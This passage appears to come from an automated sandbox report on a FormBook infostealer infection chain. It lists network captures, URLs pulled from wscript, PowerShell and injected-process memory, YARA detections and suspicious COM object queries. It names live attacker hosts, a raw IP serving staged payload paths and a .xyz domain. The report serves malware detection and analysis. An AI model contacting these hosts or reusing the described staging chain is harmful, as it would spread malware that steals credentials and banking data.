65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:39 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:41 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:44 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:46 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: wscript.exe, 00000000.00000003.1316775062.00000249C8145000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317861273.00000249C8145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.9
Source: wscript.exe, 00000000.00000003.1267819142.00000249C641B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/
Source: wscript.exe, 00000000.00000003.1316514427.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314674812.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317485663.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1315910139.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1275174756.00000249C6428000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/1333433343245333933313245333933323245333233353331324633313332333033333
Source: wscript.exe, 00000000.00000003.1315454154.00000249C6678000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1316796839.00000249C6679000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/file
Source: wscript.exe, 00000000.00000003.1315454154.00000249C6678000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1316301466.00000249C8342000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1316114082.00000249C647D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317927982.00000249C8343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317652809.00000249C647D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314570566.00000249C647C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1316205273.00000249C647D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1315432703.00000249C8149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/instant
Source: wscript.exe, 00000000.00000003.1275174756.00000249C641B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1275174756.00000249C63F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1275174756.00000249C6435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/r
Source: wscript.exe, 00000000.00000003.1275174756.00000249C6428000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/r2E3235312F31323033323032352FString
Source: wscript.exe, 00000000.00000003.1275174756.00000249C63F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/rtentionX
Source: wscript.exe, 00000000.00000003.1267819142.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267819142.00000249C6435000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267819142.00000249C63F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1275174756.00000249C6435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/s
Source: wscript.exe, 00000000.00000003.1267819142.00000249C63F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/stentionX
Source: wscript.exe, 00000000.00000003.1315454154.00000249C6678000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1275174756.00000249C641B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1275174756.00000249C63F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1316796839.00000249C6679000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1275174756.00000249C6435000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317797165.00000249C667A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/v
Source: wscript.exe, 00000000.00000003.1315454154.00000249C6678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/w1
Source: wscript.exe, 00000000.00000003.1315454154.00000249C6678000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1316796839.00000249C6679000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/w2
Source: wscript.exe, 00000000.00000003.1316775062.00000249C8145000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317751449.00000249C6675000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317861273.00000249C8145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/w6
Source: wscript.exe, 00000000.00000003.1315454154.00000249C6678000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1316796839.00000249C6679000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317751449.00000249C6675000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317797165.00000249C667A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1315432703.00000249C8149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/w7
Source: wscript.exe, 00000000.00000003.1315454154.00000249C6678000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1315432703.00000249C8149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/w8
Source: wscript.exe, 00000000.00000003.1315454154.00000249C6678000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1315432703.00000249C8149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/12032025/w9
Source: wscript.exe, 00000000.00000003.1267819142.00000249C641B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/I
Source: wscript.exe, 00000000.00000003.1275174756.00000249C641B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267819142.00000249C641B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/l/Fl-
Source: wscript.exe, 00000000.00000003.1275174756.00000249C641B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/p
Source: wscript.exe, 00000000.00000003.1275174756.00000249C641B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267819142.00000249C641B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251/xJ
Source: wscript.exe, 00000000.00000003.1316514427.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314674812.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317485663.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1315910139.00000249C6428000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251:80/12032025/instantP
Source: wscript.exe, 00000000.00000003.1275174756.00000249C6428000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251:80/12032025/r
Source: wscript.exe, 00000000.00000003.1267819142.00000249C6428000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251:80/12032025/stention
Source: wscript.exe, 00000000.00000003.1275174756.00000249C6428000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251:80/12032025/v
Source: wscript.exe, 00000000.00000003.1267819142.00000249C63DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://144.91.92.251:80/12032025/w5
Source: powershell.exe, 00000020.00000002.3747291390.0000025E90B45000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3746070795.0000021224D35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 0000002D.00000002.3744880628.000001C3BB975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft8
Source: powershell.exe, 00000013.00000002.3739560924.00000264A22E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftR1
Source: powershell.exe, 00000008.00000002.3774362352.000001DF574A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wscript.exe, 00000000.00000003.1316301466.00000249C8342000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317927982.00000249C8343000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mTEQmr
Source: wscript.exe, 00000000.00000003.1316301466.00000249C8342000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317927982.00000249C8343000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microLEymf
Source: powershell.exe, 00000008.00000002.3774362352.000001DF572F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3747287199.00000264A3BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3760000554.000001D196A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3724820036.000001A080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3752869787.0000025E923A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3749297403.000001681AE21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3769482999.0000023551F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3768807863.00000228ADFB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3749628672.000001C3BD321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3790379244.0000021226871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.3772579364.0000017621E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.3774362352.000001DF574A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: RNDzmzHPyfZMe3si.exe, 00000011.00000002.3742236502.0000000008916000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.gelida.xyz
Source: RNDzmzHPyfZMe3si.exe, 00000011.00000002.3742236502.0000000008916000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.gelida.xyz/3xxf/
Source: powershell.exe, 00000033.00000002.3772579364.0000017622038000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://144.91.92.251/MoDi.txt
Source: xcopy.exe, 00000012.00000002.3729743968.0000000008298000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000008.00000002.3774362352.000001DF572F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3747287199.00000264A3BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3760000554.000001D196A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3724820036.000001A080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3752869787.0000025E923A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3749297403.000001681AE21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3769482999.0000023551F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3768807863.00000228ADFB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3749628672.000001C3BD321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3790379244.0000021226871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.3772579364.0000017621E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: xcopy.exe, 00000012.00000002.3729743968.0000000008298000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RNDzmzHPyfZMe3si.exe, 00000011.00000002.3739542587.0000000006EAC000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000012.00000002.3727450782.0000000004A1C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: xcopy.exe, 00000012.00000002.3729743968.0000000008298000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: xcopy.exe, 00000012.00000002.3729743968.0000000008298000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xcopy.exe, 00000012.00000002.3729743968.0000000008298000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: xcopy.exe, 00000012.00000002.3729743968.0000000008298000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: xcopy.exe, 00000012.00000002.3729743968.0000000008298000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: xcopy.exe, 00000012.00000002.3729743968.0000000008298000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000008.00000002.3774362352.000001DF574A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000002.3747287199.00000264A3D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3760000554.000001D196BF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3724820036.000001A0801B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3752869787.0000025E92558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3752191349.0000025E92350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000024.00000002.3749297403.000001681AFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3769482999.0000023552108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3768807863.00000228AE168000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3749628672.000001C3BD4D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3790379244.0000021226A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.3772579364.0000017622038000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipwhois.app/xml/
Source: xcopy.exe, 00000012.00000002.3719828859.000000000305E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: xcopy.exe, 00000012.00000002.3719828859.000000000305E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: xcopy.exe, 00000012.00000002.3719828859.000000000305E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: xcopy.exe, 00000012.00000002.3719828859.0000000003035000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033i
Source: xcopy.exe, 00000012.00000002.3719828859.000000000305E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: xcopy.exe, 00000012.00000002.3719828859.000000000305E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: xcopy.exe, 00000012.00000003.1741121228.000000000827D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: xcopy.exe, 00000012.00000002.3729743968.0000000008298000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: RNDzmzHPyfZMe3si.exe, 00000011.00000002.3739542587.0000000006864000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000012.00000002.3727450782.00000000043D4000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 00000012.00000002.3729575151.0000000006850000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.1851502254.00000000202F4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: xcopy.exe, 00000012.00000002.3729743968.0000000008298000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 13.2.vbc.exe.9b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.vbc.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.3719481348.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3742236502.00000000088B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1556677119.00000000009B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1563636022.0000000007ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3724227677.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3724379961.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3726655209.0000000004F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1563569316.0000000005680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 9104, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1936, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3956, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5296, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8784, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2680, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2544, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7576, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
